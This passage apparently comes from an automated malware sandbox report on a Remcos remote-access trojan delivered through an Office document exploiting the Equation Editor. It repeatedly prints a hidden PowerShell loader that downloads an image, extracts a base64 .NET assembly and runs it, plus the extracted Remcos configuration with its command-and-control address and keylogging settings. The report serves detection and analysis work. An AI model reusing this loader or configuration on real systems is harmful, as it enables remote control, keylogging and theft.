$startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3512, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" , ProcessId: 3180, ProcessName: wscript.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3512, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3264, TargetFilename: C:\Users\user\AppData\Local\Temp\ogwzvj2i.czq.ps1

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?

                Stealing of Sensitive Information

                barindex
                Source: Registry Key setAuthor: Joe Security: Data: Details: B4 3D DD D1 91 B0 DF CC FB 95 F6 2E 53 37 48 40 98 D2 05 4C 75 58 AB 79 F1 76 B7 EE DC 24 90 16 0A D8 D8 04 61 CC 41 2E AB 49 20 6E A3 7F 5E D8 D7 08 E5 34 45 93 AC E7 03 C0 1F EF 25 8A 6D B3 4E 09 88 35 56 DA 3E BA 49 A0 77 E9 E2 4C 1F C3 B6 5A 68 F4 78 72 B9 A7 2B 6B 60 17 2C D7 B9 45 01 31 01 95 E2 79 03 38 AB FD 5A 91 10 74 24 2B 4F 86 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3008, TargetObject: HKEY_CURRENT_USER\Software\Rmc-O0U3JA\exepath
                Timestamp:2024-08-28T14:00:50.729091+0200
                SID:2020423
                Severity:1
                Source Port:80
                Destination Port:49176
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-08-28T14:00:50.729091+0200
                SID:2020425
                Severity:1
                Source Port:80
                Destination Port:49176
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-08-28T14:00:55.204396+0200
                SID:2803304
                Severity:3
                Source Port:49179
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-28T14:01:03.474225+0200
                SID:2036594
                Severity:1
                Source Port:49178
                Destination Port:8243
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-28T14:00:52.184273+0200
                SID:2036594
                Severity:1
                Source Port:49177
                Destination Port:8243
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-28T14:00:49.624657+0200
                SID:2049038
                Severity:1
                Source Port:443
                Destination Port:49175
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgURL Reputation: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{25DA551D-57C7-4B7F-89C3-ACFA37B5F42F}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTR
                Source: August Shipment - Inv No. 041.xlsJoe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_004338C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                Source: powershell.exe, 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_963cfc13-1

                Exploits

                barindex
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.43deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3008, type: MEMORYSTR
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 137.184.234.91 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                Source: ~WRF{25DA551D-57C7-4B7F-89C3-ACFA37B5F42F}.tmp.4.drStream path '_1786337192/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{25DA551D-57C7-4B7F-89C3-ACFA37B5F42F}.tmp.4.drStream path '_1786337197/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407538 _wcslen,CoGetObject,14_2_00407538
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49175 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49167 version: TLS 1.2
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.468216218.0000000006340000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.465793095.00000000035E9000.00000004.00000800.00020000.00000000.sdmp
